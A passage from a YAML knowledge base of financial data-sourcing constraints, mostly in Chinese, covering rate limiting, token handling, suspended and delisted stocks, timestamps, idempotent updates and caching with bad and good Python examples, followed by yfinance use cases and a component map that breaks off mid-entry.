      \    for attempt in range(max_retries):\n        try:\n            return func(*args)\n        except (RateLimitError,\
      \ TimeoutError) as e:\n            if attempt == max_retries - 1:\n                raise\n            delay = min(base_delay\
      \ * (2 ** attempt), 60)\n            delay += random.uniform(0, delay * 0.1)  # +10% Jitter\n            time.sleep(delay)\n"
  provenance:
    source: community_validated
  _source_file: data-sourcing/constraints.yaml
- id: SHARED-DS-RL-002
  statement: '批量 API 调用必须控制并发数（max_workers），不可无限制并行。 免费 API（akshare/tushare 免费版）通常限制为 1-3 并发； 付费 API 也有并发上限（tushare 积分制，不同积分对应不同并发）。
    超出并发限制会触发 429 或 IP 封禁。推荐使用 asyncio.Semaphore 或 ThreadPoolExecutor 的 max_workers 参数显式控制。

    '
  severity: high
  capability_tags:
    activities:
    - data-sourcing
  applicable_conditions:
    blueprint_has_stage:
    - data_collection
  incompatible_with_tags: {}
  stage_id_remap_hints:
  - from_stage: data_collection
    constraint_context: concurrent API calls must be bounded by explicit max_workers/semaphore
  evidence_refs:
  - type: community_validated
    ref: tushare 文档积分与频率限制；akshare 文档接口说明；MiniMax 并发踩坑记录（Doramagic内部记忆）
  reference_code:
    bad_example: "# BAD: 无并发限制，触发 429\nwith ThreadPoolExecutor() as executor:\n    results = list(executor.map(fetch_stock,\
      \ stock_list))\n    # 默认 max_workers 可能创建几十个线程，立即触发 429\n"
    good_example: "# GOOD: 显式限制并发（akshare 免费版建议 max_workers=2）\nfrom concurrent.futures import ThreadPoolExecutor\nMAX_WORKERS\
      \ = 2  # 根据 API 文档调整\n\nwith ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:\n    results = list(executor.map(fetch_stock,\
      \ stock_list))\n"
  provenance:
    source: community_validated
  _source_file: data-sourcing/constraints.yaml
- id: SHARED-DS-RL-003
  statement: 'API Token / 凭证安全：数据源 API key（tushare token / akshare 无需 token 但 其他商业数据源需要）不可硬编码在代码中，必须通过环境变量或配置文件读取。 硬编码 token
    提交到 Git 会导致 token 泄露和费用损失。

    '
  severity: high
  capability_tags:
    activities:
    - data-sourcing
  applicable_conditions:
    blueprint_has_stage:
    - data_collection
  incompatible_with_tags: {}
  stage_id_remap_hints:
  - from_stage: data_collection
    constraint_context: API tokens must be loaded from environment variables, not hardcoded
  evidence_refs:
  - type: community_validated
    ref: tushare 文档 token 管理；GitHub Secret Scanning 最佳实践
    url: https://tushare.pro/document/2
  reference_code:
    bad_example: '# BAD: Token 硬编码，提交到 Git 后泄露

      ts.set_token(''abc123def456your_token_here'')

      pro = ts.pro_api()

      '
    good_example: "# GOOD: 从环境变量读取 token\nimport os\ntoken = os.environ.get('TUSHARE_TOKEN')\nif not token:\n    raise ValueError(\"\
      TUSHARE_TOKEN environment variable not set\")\nts.set_token(token)\npro = ts.pro_api()\n"
  provenance:
    source: community_validated
  _source_file: data-sourcing/constraints.yaml
- id: SHARED-DS-RL-004
  statement: '请求节流（Throttling）：对同一 API 的批量请求应在请求间插入最小间隔 （akshare 部分接口要求 ≥ 0.5s；tushare 免费版每分钟 200 次）。 纯代码 sleep 不如令牌桶（Token
    Bucket）算法精确，推荐使用 ratelimit 或 slowapi 等成熟库。

    '
  severity: medium
  capability_tags:
    activities:
    - data-sourcing
  applicable_conditions:
    blueprint_has_stage:
    - data_collection
  incompatible_with_tags: {}
  stage_id_remap_hints:
  - from_stage: data_collection
    constraint_context: per-request minimum interval must be enforced between API calls
  evidence_refs:
  - type: community_validated
    ref: akshare 官方文档接口说明；知乎《量化数据采集：如何优雅处理限速》
    url: https://akshare.akfamily.xyz/
  reference_code:
    bad_example: "# BAD: 固定 sleep 不准确，高并发下失效\nfor code in stock_list:\n    data = ak.stock_zh_a_hist(symbol=code)\n    time.sleep(0.1)\
      \  # 可能不够，也可能太保守\n"
    good_example: "# GOOD: 使用 ratelimit 装饰器精确控制\nfrom ratelimit import limits, sleep_and_retry\n\n@sleep_and_retry\n@limits(calls=200,\
      \ period=60)  # tushare 免费版: 200次/分钟\ndef fetch_daily(code, start, end):\n    return ts.pro_bar(ts_code=code, start_date=start,\
      \ end_date=end)\n"
  provenance:
    source: community_validated
  _source_file: data-sourcing/constraints.yaml
- id: SHARED-DS-MISS-001
  statement: '停牌日数据缺失策略：停牌股票在停牌期间无成交数据，数据库中会出现日期缺口。 缺失日期不可使用 forward-fill（会产生虚假成交量）； 应在数据库中以 is_suspended=True 标记，量和成交额填 0，价格保留前一日收盘价。
    因子计算时必须过滤 is_suspended=True 的行。

    '
  severity: high
  capability_tags:
    activities:
    - data-sourcing
    - backtesting
  applicable_conditions:
    blueprint_has_stage:
    - data_collection
    - data_filtering
  incompatible_with_tags: {}
  stage_id_remap_hints:
  - from_stage: data_collection
    constraint_context: suspended trading days must be explicitly marked with is_suspended=True, not silently forward-filled
  evidence_refs:
  - type: community_validated
    ref: tushare 文档 daily 接口停牌标志；qlib 文档 suspended stock handling
    url: https://tushare.pro/document/2?doc_id=28
  reference_code:
    bad_example: '# BAD: forward-fill 停牌日，量保持前一日非零值

      df = df.reindex(all_trading_days).fillna(method=''ffill'')

      # volume 被填充为非零值，停牌变"正常交易"

      '
    good_example: "# GOOD: 停牌日明确标记\nfull_index = pd.MultiIndex.from_product(\n    [all_stocks, all_trading_days], names=['stock',\
      \ 'date'])\ndf_full = df.reindex(full_index)\ndf_full['is_suspended'] = df_full['volume'].isna()\ndf_full['volume']\
      \ = df_full['volume'].fillna(0)\ndf_full['amount'] = df_full['amount'].fillna(0)\ndf_full['close'] = df_full['close'].fillna(method='ffill')\
      \  # 价格 ffill\n"
  provenance:
    source: community_validated
  _source_file: data-sourcing/constraints.yaml
- id: SHARED-DS-MISS-002
  statement: '新上市股票的历史数据边界：新股上市首日开始在数据库中出现，但其上市前 无历史数据。若因子计算的 lookback 期超过上市天数，会产生所有 NaN 因子值。 采集时应记录每只股票的上市日期（list_date），采集逻辑应以上市日期为起点，
    不以固定开始日期。

    '
  severity: medium
  capability_tags:
    activities:
    - data-sourcing
  applicable_conditions:
    blueprint_has_stage:
    - data_collection
  incompatible_with_tags: {}
  stage_id_remap_hints:
  - from_stage: data_collection
    constraint_context: data collection start date must be bounded by stock listing date, not a fixed start date
  evidence_refs:
  - type: community_validated
    ref: tushare stock_basic 接口 list_date 字段；akshare stock_info_a_code_name 接口
    url: https://tushare.pro/document/2?doc_id=25
  reference_code:
    bad_example: "# BAD: 统一从 2010-01-01 开始，新股有大量 NaN\nfor code in stock_list:\n    df = fetch(code, start='2010-01-01', end=today)\n"
    good_example: "# GOOD: 从上市日期开始采集\nstock_info = ts.get_stock_basics()  # 含 list_date\nfor code in stock_list:\n    list_date\
      \ = stock_info.loc[code, 'list_date']\n    df = fetch(code, start=list_date, end=today)\n"
  provenance:
    source: community_validated
  _source_file: data-sourcing/constraints.yaml
- id: SHARED-DS-MISS-003
  statement: '退市股票的数据完整性：已退市股票在主流数据源（akshare/tushare）中依然 可以查询历史数据（退市前的历史），但退市日期后无数据。 历史股票池构建时必须包含已退市股票（否则幸存者偏差）， 且采集时需明确处理退市日截止边界。

    '
  severity: high
  capability_tags:
    activities:
    - data-sourcing
    - backtesting
  applicable_conditions:
    blueprint_has_stage:
    - data_collection
  incompatible_with_tags: {}
  stage_id_remap_hints:
  - from_stage: data_collection
    constraint_context: delisted stocks must be included in historical universe; delist_date must be recorded
  evidence_refs:
  - type: community_validated
    ref: tushare stock_basic 接口 delist_date 字段；qlib 文档 Delisted Stock Handling
    url: https://tushare.pro/document/2?doc_id=25
  reference_code:
    bad_example: '# BAD: 只采集当前上市股票，遗漏已退市股票

      stock_list = ts.get_stock_basics()  # 只含当前上市股票

      '
    good_example: "# GOOD: 采集全量股票（含已退市）\nall_stocks = pro.stock_basic(\n    exchange='', list_status='L',  # 上市\n)\ndelisted\
      \ = pro.stock_basic(\n    exchange='', list_status='D',  # 退市\n)\nfull_universe = pd.concat([all_stocks, delisted])\n"
  provenance:
    source: community_validated
  _source_file: data-sourcing/constraints.yaml
- id: SHARED-DS-MISS-004
  statement: '多数据源数据对账（Cross-Source Reconciliation）：同一数据（如收盘价） 从不同数据源（akshare/tushare/baostock）获取可能存在细微差异 （不同复权方式/不同节假日处理/除息调整时间不同）。
    应在 pipeline 中实施多源对账检查，差异超阈值（如 0.1%）时记录告警并人工确认。

    '
  severity: high
  capability_tags:
    activities:
    - data-sourcing
  applicable_conditions:
    blueprint_has_stage:
    - data_collection
  incompatible_with_tags: {}
  stage_id_remap_hints:
  - from_stage: data_collection
    constraint_context: when using multiple data sources, cross-source price reconciliation must be performed
  evidence_refs:
  - type: community_validated
    ref: 雪球量化社区《数据质量：多数据源对账实践》；知乎《量化数据质量保障》
  reference_code:
    bad_example: '# BAD: 切换数据源不做对账，静默吞下差异

      df_primary = akshare_fetch(code)

      df_backup = baostock_fetch(code)

      # 如果主源失败，直接用备源，不验证一致性

      '
    good_example: "# GOOD: 双源对账，价格差异超 0.5% 告警\ntolerance = 0.005\nmerged = df_primary.join(df_backup, lsuffix='_ak', rsuffix='_bs')\n\
      diff = (merged['close_ak'] - merged['close_bs']).abs() / merged['close_ak']\nanomalies = diff[diff > tolerance]\nif\
      \ len(anomalies) > 0:\n    logger.warning(f\"Price discrepancy > {tolerance:.1%}: {len(anomalies)} rows\")\n"
  provenance:
    source: community_validated
  _source_file: data-sourcing/constraints.yaml
- id: SHARED-DS-TIME-001
  statement: '时间戳精度与类型一致性：数据库中时间戳应使用统一的数据类型 （timestamp 而非 varchar/int）。混用字符串日期（''2024-01-15''）和 Timestamp 对象是比较、索引、merge 出现细微
    bug 的常见来源， 应在 pipeline 入口处强制转换。

    '
  severity: high
  capability_tags:
    activities:
    - data-sourcing
  applicable_conditions:
    blueprint_has_stage:
    - data_collection
  incompatible_with_tags: {}
  stage_id_remap_hints:
  - from_stage: data_collection
    constraint_context: all date/time fields must be normalized to pd.Timestamp at data ingestion boundary
  evidence_refs:
  - type: community_validated
    ref: pandas 文档 to_datetime 最佳实践；SQLAlchemy TIMESTAMP 类型说明
    url: https://pandas.pydata.org/docs/reference/api/pandas.to_datetime.html
  reference_code:
    bad_example: '# BAD: 存储为字符串，比较出错

      df[''date''] = ''2024-01-15''  # 字符串

      latest = df[df[''date''] == ''2024-01-15'']  # 字符串比较，效率低

      '
    good_example: '# GOOD: 统一转换为 Timestamp

      df[''date''] = pd.to_datetime(df[''date''])

      latest = df[df[''date''] == pd.Timestamp(''2024-01-15'')]

      '
  provenance:
    source: community_validated
  _source_file: data-sourcing/constraints.yaml
- id: SHARED-DS-TIME-002
  statement: '交易时间与自然时间的区分：日线数据的"日期"通常对应交易日（T日）， 而新闻/公告数据的"时间"是自然时间。合并两类数据时，必须将自然时间 映射到下一个可用交易日（next available trading day），
    否则会产生"公告在T日，但T日盘中已经可用"的 lookahead 问题。

    '
  severity: high
  capability_tags:
    activities:
    - data-sourcing
    - backtesting
  applicable_conditions:
    blueprint_has_stage:
    - data_collection
    - data_filtering
  incompatible_with_tags: {}
  stage_id_remap_hints:
  - from_stage: data_collection
    constraint_context: announcement timestamps must be mapped to next trading day open, not announcement date
  evidence_refs:
  - type: community_validated
    ref: 知乎《量化数据时间戳处理：交易日与自然日的转换》；qlib 文档 point-in-time data
    url: https://qlib.readthedocs.io/
  reference_code:
    bad_example: '# BAD: 公告日当天即可用于交易信号（可能是盘后公告）

      signals = df.merge(announcements, on=''date'')  # 公告日 = 交易日

      '
    good_example: "# GOOD: 盘后公告映射到下一交易日\nimport exchange_calendars as xcals\ncal = xcals.get_calendar('XSHG')\n\ndef announcement_to_trade_date(ann_dt,\
      \ market_close_hour=15):\n    date = pd.Timestamp(ann_dt)\n    if date.hour >= market_close_hour:\n        # 盘后公告 →\
      \ 下一交易日生效\n        return cal.next_session(date.date())\n    else:\n        return date.date()\n\nannouncements['trade_date']\
      \ = announcements['ann_datetime'].apply(\n    announcement_to_trade_date)\n"
  provenance:
    source: community_validated
  _source_file: data-sourcing/constraints.yaml
- id: SHARED-DS-TIME-003
  statement: '夏令时（DST）处理：采集美股/欧洲股市数据时，夏令时切换日（3月/11月） 会导致同一 HH:MM 时刻对应不同的 UTC 时间，若未处理，当日时序数据 会出现1小时的漂移。应始终以 UTC 存储，展示时按市场本地时区转换。

    '
  severity: medium
  capability_tags:
    activities:
    - data-sourcing
  applicable_conditions:
    blueprint_has_stage:
    - data_collection
  incompatible_with_tags:
    markets:
    - cn-astock
  stage_id_remap_hints:
  - from_stage: data_collection
    constraint_context: DST transitions must be handled when collecting US/EU market data; store as UTC
  evidence_refs:
  - type: community_validated
    ref: pytz 文档 DST 处理；exchange_calendars 文档
    url: https://pytz.sourceforge.net/
  reference_code:
    bad_example: '# BAD: 用 naive datetime，夏令时切换日漂移

      df[''datetime''] = pd.to_datetime(df[''time_str''])  # no timezone

      '
    good_example: "# GOOD: 以 UTC 存储，展示时转本地时区\nimport pytz\neastern = pytz.timezone('America/New_York')\ndf['datetime_utc']\
      \ = pd.to_datetime(df['time_str']\n    ).dt.tz_localize(eastern, ambiguous='NaT'\n    ).dt.tz_convert('UTC')\n"
  provenance:
    source: community_validated
  _source_file: data-sourcing/constraints.yaml
- id: SHARED-DS-INCR-001
  statement: '增量更新幂等性：数据更新脚本必须是幂等的（多次运行结果相同）。 若脚本因网络中断在中途失败，重新运行时不应产生重复数据或数据缺口。 实现方式：先写入临时表，校验后 UPSERT 到主表，不直接 INSERT/APPEND。

    '
  severity: high
  capability_tags:
    activities:
    - data-sourcing
  applicable_conditions:
    blueprint_has_stage:
    - data_collection
  incompatible_with_tags: {}
  stage_id_remap_hints:
  - from_stage: data_collection
    constraint_context: 'data update scripts must be idempotent: use UPSERT, not INSERT/APPEND'
  evidence_refs:
  - type: community_validated
    ref: SQLite UPSERT 文档（INSERT OR REPLACE）；知乎《量化数据库设计：幂等更新》
    url: https://www.sqlite.org/lang_upsert.html
  reference_code:
    bad_example: '# BAD: 直接 APPEND，重跑产生重复数据

      df_new.to_sql(''daily_prices'', con=engine, if_exists=''append'', index=False)

      '
    good_example: "# GOOD: UPSERT（主键冲突则更新）\nfor _, row in df_new.iterrows():\n    engine.execute(\"\"\"\n        INSERT OR\
      \ REPLACE INTO daily_prices\n        (stock_code, date, open, high, low, close, volume)\n        VALUES (?, ?, ?, ?,\
      \ ?, ?, ?)\n    \"\"\", row.to_list())\n# SQLAlchemy 版本：使用 on_conflict_do_update\n"
  provenance:
    source: community_validated
  _source_file: data-sourcing/constraints.yaml
- id: SHARED-DS-INCR-002
  statement: '数据完整性检验（数据校验和/行数检查）：每次数据更新后， 应对关键字段做完整性检验：行数是否在预期范围内、价格是否为正数、 日期是否连续（无缺失交易日）。缺少自动校验的数据管道是"沉默腐烂"的根源。

    '
  severity: high
  capability_tags:
    activities:
    - data-sourcing
  applicable_conditions:
    blueprint_has_stage:
    - data_collection
  incompatible_with_tags: {}
  stage_id_remap_hints:
  - from_stage: data_collection
    constraint_context: 'post-update data quality checks must run automatically: row count, price positivity, date continuity'
  evidence_refs:
  - type: community_validated
    ref: Great Expectations 文档；知乎《量化数据质量治理：如何发现数据腐烂》
    url: https://docs.greatexpectations.io/
  reference_code:
    bad_example: '# BAD: 更新后不做任何检验

      update_daily_prices(date=today)

      print("Update done")  # 不知道是否成功，不知道有无缺漏

      '
    good_example: '# GOOD: 更新后自动校验

      update_daily_prices(date=today)


      # 检验1: 行数合理（A股约5000只股票）

      row_count = db.count("SELECT COUNT(*) FROM daily_prices WHERE date = ?", today)

      assert 4000 <= row_count <= 6000, f"Unexpected row count: {row_count}"


      # 检验2: 无零价格或负价格

      invalid = db.count("SELECT COUNT(*) FROM daily_prices WHERE close <= 0")

      assert invalid == 0, f"Found {invalid} invalid prices"


      # 检验3: 无日期缺口（检查最近 5 个交易日连续性）

      check_no_date_gaps(db, last_n_trading_days=5)

      '
  provenance:
    source: community_validated
  _source_file: data-sourcing/constraints.yaml
- id: SHARED-DS-INCR-003
  statement: '数据版本化：数据管道的输出数据应版本化管理（data versioning）。 当数据源更新了历史数据（如修订调整后的财务数据）， 旧版本数据应保留可追溯，不应静默覆盖，以便对比版本间差异及复现历史回测。

    '
  severity: medium
  capability_tags:
    activities:
    - data-sourcing
  applicable_conditions:
    blueprint_has_stage:
    - data_collection
  incompatible_with_tags: {}
  stage_id_remap_hints:
  - from_stage: data_collection
    constraint_context: historical data revisions must be versioned; silent overwrites are prohibited
  evidence_refs:
  - type: community_validated
    ref: ArcticDB 文档数据版本化；DVC (Data Version Control) 文档
    url: https://arcticdb.io/
  reference_code:
    bad_example: '# BAD: 覆盖写入，历史版本丢失

      df_revised.to_csv(''financial_data.csv'', index=False)  # 覆盖旧版本

      '
    good_example: '# GOOD: 带时间戳的版本化存储（使用 ArcticDB 或简单目录版本）

      version = datetime.now().strftime(''%Y%m%d_%H%M%S'')

      df_revised.to_parquet(f''data/financial_data_v{version}.parquet'')

      # 软链接指向最新版本

      # ln -sf financial_data_v{version}.parquet financial_data_latest.parquet


      # 或使用 ArcticDB（内置版本化）:

      import arcticdb as adb

      lib = adb.Arctic(''lmdb:///data/arctic_store'').get_library(''finance'')

      lib.write(''financial_data'', df_revised)  # 自动版本化

      '
  provenance:
    source: community_validated
  _source_file: data-sourcing/constraints.yaml
- id: SHARED-DS-INCR-004
  statement: '数据对齐到交易日历边界：采集完成后，应验证所有股票/资产的数据覆盖 完整性与交易日历的一致性。每只股票在每个交易日都应有一行数据 （停牌标记，不是缺失）。通过 pivot_table 检查 NaN 比例是有效的快速诊断手段。

    '
  severity: medium
  capability_tags:
    activities:
    - data-sourcing
  applicable_conditions:
    blueprint_has_stage:
    - data_collection
    - data_filtering
  incompatible_with_tags: {}
  stage_id_remap_hints:
  - from_stage: data_collection
    constraint_context: data completeness vs trading calendar must be verified after each ingestion
  evidence_refs:
  - type: community_validated
    ref: qlib 文档 data quality inspection；tushare 文档 daily 接口完整性说明
    url: https://qlib.readthedocs.io/
  reference_code:
    bad_example: '# BAD: 不检验数据完整性，静默忽略缺失

      df = load_all_stocks(start_date, end_date)

      run_backtest(df)

      '
    good_example: "# GOOD: pivot 矩阵检验覆盖率\nprice_matrix = df.pivot_table(\n    index='date', columns='stock_code', values='close')\n\
      coverage = 1 - price_matrix.isna().mean().mean()\nprint(f\"Data coverage: {coverage:.1%}\")\nif coverage < 0.95:\n \
      \   logger.warning(f\"Low coverage: {coverage:.1%}, check for missing stocks\")\n# 找出缺失严重的股票\nmissing_stocks = price_matrix.isna().mean()\n\
      bad_stocks = missing_stocks[missing_stocks > 0.05].index.tolist()\nif bad_stocks:\n    logger.warning(f\"Stocks with\
      \ >5% missing days: {bad_stocks}\")\n"
  provenance:
    source: community_validated
  _source_file: data-sourcing/constraints.yaml
- id: SHARED-DS-INCR-005
  statement: '缓存策略（Caching）：频繁读取的静态/低频更新数据（如股票信息、行业分类、 指数成分股）应本地缓存，避免每次运行重复 API 调用。 缓存必须设置过期时间（TTL），防止使用过期的行业分类或已失效的成分股信息。

    '
  severity: medium
  capability_tags:
    activities:
    - data-sourcing
  applicable_conditions:
    blueprint_has_stage:
    - data_collection
  incompatible_with_tags: {}
  stage_id_remap_hints:
  - from_stage: data_collection
    constraint_context: static/low-frequency data must be cached locally with TTL to avoid unnecessary API calls
  evidence_refs:
  - type: community_validated
    ref: akshare 文档建议本地缓存；functools.lru_cache 文档；joblib.Memory 文档
    url: https://akshare.akfamily.xyz/
  reference_code:
    bad_example: "# BAD: 每次运行都重新获取行业分类（慢且消耗配额）\ndef get_industry(stock):\n    return ak.stock_board_industry_name_em()  #\
      \ 每次调用 API\n"
    good_example: "# GOOD: 缓存行业分类，每日刷新一次\nfrom joblib import Memory\nfrom datetime import date\n\ncache_dir = './data_cache'\n\
      memory = Memory(cache_dir, verbose=0)\n\[email protected]\ndef get_industry_cached(cache_date: str):  # cache_date 作为缓存\
      \ key\n    return ak.stock_board_industry_name_em()\n\n# 每日刷新：用今日日期作为 key，自动使旧缓存失效\nindustry_df = get_industry_cached(str(date.today()))\n"
  provenance:
    source: community_validated
  _source_file: data-sourcing/constraints.yaml
resources_injected: {}
known_use_cases:
- kuc_id: KUC-101
  source_file: tests/test_utils.py
  business_problem: Ensures date/timezone parsing and validation utilities work correctly for handling mixed timezone data
    from financial APIs.
  intent_keywords:
  - timezone
  - datetime
  - validation
  - parse
  - utility
  stage: data_collection
  data_domain: mixed
  type: data_pipeline
- kuc_id: KUC-102
  source_file: tests/test_screener.py
  business_problem: Tests the ability to filter and screen stocks based on financial criteria like price thresholds and predefined
    strategies.
  intent_keywords:
  - screen
  - filter
  - query
  - criteria
  - find stocks
  stage: data_collection
  data_domain: financial_data
  type: screening
- kuc_id: KUC-103
  source_file: tests/test_search.py
  business_problem: Allows users to find ticker symbols by searching company names or partial queries, including fuzzy matching
    for misspellings.
  intent_keywords:
  - search
  - find ticker
  - symbol lookup
  - company name
  - fuzzy
  stage: data_collection
  data_domain: financial_data
  type: research_analysis
- kuc_id: KUC-104
  source_file: tests/test_calendars.py
  business_problem: Retrieves upcoming earnings dates and IPO information calendars to help investors track corporate events.
  intent_keywords:
  - earnings calendar
  - IPO
  - upcoming events
  - corporate events
  - dates
  stage: data_collection
  data_domain: financial_data
  type: research_analysis
- kuc_id: KUC-105
  source_file: tests/test_prices.py
  business_problem: Fetches historical price and volume data for securities across multiple intervals (daily, weekly, monthly)
    and time periods.
  intent_keywords:
  - price history
  - historical data
  - OHLCV
  - download
  - chart data
  stage: data_collection
  data_domain: market_data
  type: data_pipeline
- kuc_id: KUC-106
  source_file: tests/test_ticker.py
  business_problem: Retrieves comprehensive metadata for a ticker including holder information, splits, recommendations, and
    fundamental data.
  intent_keywords:
  - ticker info
  - metadata
  - holders
  - recommendations
  - splits
  stage: data_collection
  data_domain: financial_data
  type: research_analysis
- kuc_id: KUC-107
  source_file: tests/test_price_repair.py
  business_problem: Corrects corrupted or misaligned price data and resamples data between different time intervals while
    maintaining data integrity.
  intent_keywords:
  - repair
  - fix data
  - resample
  - corrupt
  - clean data
  stage: data_collection
  data_domain: market_data
  type: data_pipeline
- kuc_id: KUC-108
  source_file: tests/test_live.py
  business_problem: Provides real-time cryptocurrency price streaming via WebSocket for trading applications and live market
    monitoring.
  intent_keywords:
  - live
  - real-time
  - stream
  - websocket
  - crypto
  stage: monitoring
  data_domain: market_data
  type: live_trading
- kuc_id: KUC-109
  source_file: tests/test_cache_noperms.py
  business_problem: Handles cache storage gracefully when running in restricted environments without write permissions to
    the filesystem.
  intent_keywords:
  - cache
  - permissions
  - fallback
  - timezone storage
  - restricted
  stage: data_collection
  data_domain: mixed
  type: monitoring
- kuc_id: KUC-110
  source_file: tests/test_multi.py
  business_problem: Downloads price data for multiple tickers concurrently with thread safety, ensuring results don't get
    mixed between tickers.
  intent_keywords:
  - concurrent
  - thread-safe
  - multi-ticker
  - parallel
  - batch download
  stage: data_collection
  data_domain: market_data
  type: data_pipeline
- kuc_id: KUC-111
  source_file: tests/test_lookup.py
  business_problem: Looks up ticker symbols filtered by asset type (stocks, ETFs, mutual funds, indices) to find specific
    securities.
  intent_keywords:
  - lookup
  - ETF
  - mutual fund
  - index
  - security type
  stage: data_collection
  data_domain: financial_data
  type: research_analysis
- kuc_id: KUC-112
  source_file: tests/test_cache.py
  business_problem: Caches timezone data for securities to reduce API calls and improve performance when fetching data for
    frequently-used tickers.
  intent_keywords:
  - cache
  - timezone
  - storage
  - performance
  - optimize
  stage: data_collection
  data_domain: mixed
  type: monitoring
component_capability_map:
  project: finance-bp-128--yfinance
  scan_date: '2026-04-22'
  stats:
    total_files: 9
    total_classes: 46
    total_functions: 0
    total_stages: 9
  modules:
    http_&_session_management:
      class_count: 4
      stage_id: http_layer
      stage_order: 1
      responsibility: Manages each HTTP requests, session handling, cookie authentication, and rate limiting. Singleton pattern
        ensures shared session/cookies across each Ticker instances for efficiency and proper Yahoo API access.
      classes:
      - name: YfData.get_json
        file: http_&_session_management/yfdata-get-json.py
        line: 0
        kind: required_method
        signature: ''
      - name: YfData.post
        file: http_&_session_management/yfdata-post.py
        line: 0
        kind: required_method
        signature: ''
      - name: ConfigMgr.get_config
        file: http_&_session_management/configmgr-get-config.py
        line: 0
        kind: required_method
        signature: ''
      - name: session_backend
        file: http_&_session_management/session-backend.py
        line: 0
        kind: replaceable_point
      design_decision_count: 3
    price_history_retrieval_&_repair:
      class_count: 7
      stage_id: price_history
      stage_order: 2
      responsibility: Fetches OHLCV data from Yahoo Finance chart API, handles timezone detection, repairs common data errors
        including currency unit mixups, missing prices, bad dividend adjustments, and capital gains double-counting. Most
        complex module with 3000+ lines.
      classes:
      - name: PriceHistory.fetch
        file: price_history_retrieval_&_repair/pricehistory-fetch.py
        line: 0
        kind: required_method
        signature: ''
      - name: _reconstruct_intervals_batch
        file: price_history_retrieval_&_repair/reconstruct-intervals-batch.py
        line: 0
        kind: required_method
        signature: ''
      - name: _fix_unit_random_mixups
        file: price_history_retrieval_&_repair/fix-unit-random-mixups.py
        line: 0
        kind: required_method
        signature: ''
      - name: _fix_bad_div_adjust
        file: price_history_retrieval_&_repair/fix-bad-div-adjust.py
        line: 0
        kind: required_method
        signature: ''
      - name: _repair_capital_gains
        file: price_history_retrieval_&_repair/repair-capital-gains.py
        line: 0
        kind: required_method
        signature: ''
      - name: price_repair_strategy
        file: price_history_retrieval_&_repair/price-repair-strategy.py
        line: 0
        kind: replaceable_point
      - name: data_source
        file: price_history_retrieval_&_repair/data-source.py
        line: 0
        kind: replaceable_point
      design_decision_count: 6
    quote_&_financial_analysis:
      class_count: 5
      stage_id: quote_analysis
      stage_order: 3
      responsibility: Fetches quotes, analyst recommendations, earnings estimates, financial statements, sustainability data,
        and fast market info. Separate scraper classes per data domain ensure isolation and independent evolution.
      classes:
      - name: Quote.fetch_info
        file: quote_&_financial_analysis/quote-fetch-info.py
        line: 0
        kind: required_method
        signature: ''
      - name: Analysis.fetch_estimates
        file: quote_&_financial_analysis/analysis-fetch-estimates.py
        line: 0
        kind: required_method
        signature: ''
      - name: Fundamentals.fetch_financials
        file: quote_&_financial_analysis/fundamentals-fetch-financials.py
        line: 0
        kind: required_method
        signature: ''
      - name: FastInfo.price
        file: quote_&_financial_analysis/fastinfo-price.py
        line: 0
        kind: required_method
        signature: ''
      - name: info_data_source
        file: quote_&_financial_analysis/info-data-source.py
        line: 0
        kind: replaceable_point
      design_decision_count: 2
    ticker_facade:
      class_count: 8
      stage_id: ticker_facade
      stage_order: 4
      responsibility: Main user-facing API combining each scrapers under single Ticker interface. Provides convenience methods,
        property accessors, and automatic lazy loading of components for seamless data access.
      classes:
      - name: Ticker.history
        file: ticker_facade/ticker-history.py
        line: 0
        kind: required_method
        signature: ''
      - name: Ticker.get_info
        file: ticker_facade/ticker-get-info.py
        line: 0
        kind: required_method
        signature: ''
      - name: Ticker.income_stmt
        file: ticker_facade/ticker-income-stmt.py
        line: 0
        kind: required_method
        signature: ''
      - name: Ticker.balance_sheet
        file: ticker_facade/ticker-balance-sheet.py
        line: 0
        kind: required_method
        signature: ''
      - name: Ticker.cashflow
        file: ticker_facade/ticker-cashflow.py
        line: 0
        kind: required_method
        signature: ''
      - name: Ticker.recommendations
        file: ticker_facade/ticker-recommendations.py
        line: 0
        kind: required_method
        signature: ''
      - name: Ticker.get
        file: ticker_facade/ticker-get.py
        line: 0
        kind: required_method
        signature: ''
      - name: session_injection
        file: ticker_facade/session-injection.py
        line: 0
        kind: replaceable_point
      design_decision_count: 3
    batch_download_orchestration:
      class_count: 4
      stage_id: batch_download
      stage_order: 5
      responsibility: Downloads data for multiple tickers with optional multithreading, progress tracking, and error aggregation.
        Returns MultiIndex DataFrame for efficient analysis.
      classes:
      - name: download
        file: batch_download_orchestration/download.py
        line: 0
        kind: required_method
        signature: ''
      - name: _download_one
        file: batch_download_orchestration/download-one.py
        line: 0
        kind: required_method
        signature: ''
      - name: ProgressBar
        file: batch_download_orchestration/progressbar.py
        line: 0
        kind: required_method
        signature: ''
      - name: threading_model
        file: batch_download_orchestration/threading-model.py
        line: 0
        kind: replaceable_point
      design_decision_count: 3
    domain_entities_(sector/industry):
      class_count: 5
      stage_id: domain_entities
      stage_order: 6
      responsibility: Provides sector and industry classification data, top companies, ETFs, and related information using
        abstract base class pattern for consistent interface.
      classes:
      - name: Sector.top_companies
        file: domain_entities_(sector/industry)/sector-top-companies.py
        line: 0
        kind: required_method
        signature: ''
      - name: Sector.etfs
        file: domain_entities_(sector/industry)/sector-etfs.py
        line: 0
        kind: required_method
        signature: ''
      - name: Industry.top_companies
        file: domain_entities_(sector/industry)/industry-top-companies.py
        line: 0
        kind: required_method
        signature: ''
      - name: Domain._fetch_and_parse
        file: domain_entities_(sector/industry)/domain-fetch-and-parse.py
        line: 0
        kind: required_method
        signature: ''
      - name: data_source
        file: domain_entities_(sector/industry)/data-source.py
        line: 0
        kind: replaceable_point
      design_decision_count: 2
    stock_screener:
      class_count: 4
      stage_id: screener
      stage_order: 7
      responsibility: Builds and executes stock screening queries based on financial criteria including PE ratio, market cap,
        and other metrics with composable operator pattern.
      classes:
      - name: EquityQuery.add_filter
        file: stock_screener/equityquery-add-filter.py
        line: 0
        kind: required_method
        signature: ''
      - name: screen
        file: stock_screener/screen.py
        line: 0
        kind: required_method
        signature: ''
      - name: QueryBase.valid_fields
        file: stock_screener/querybase-valid-fields.py
        line: 0
        kind: required_method
        signature: ''
      - name: query_validation
        file: stock_screener/query-validation.py
        line: 0
        kind: replaceable_point
      design_decision_count: 2
    live_streaming_(websocket):
      class_count: 4
      stage_id: live_streaming
      stage_order: 8
      responsibility: Real-time price streaming via Yahoo Finance WebSocket API with separate sync and async implementations
        for event loop compatibility.
      classes:
      - name: WebSocket.connect
        file: live_streaming_(websocket)/websocket-connect.py
        line: 0
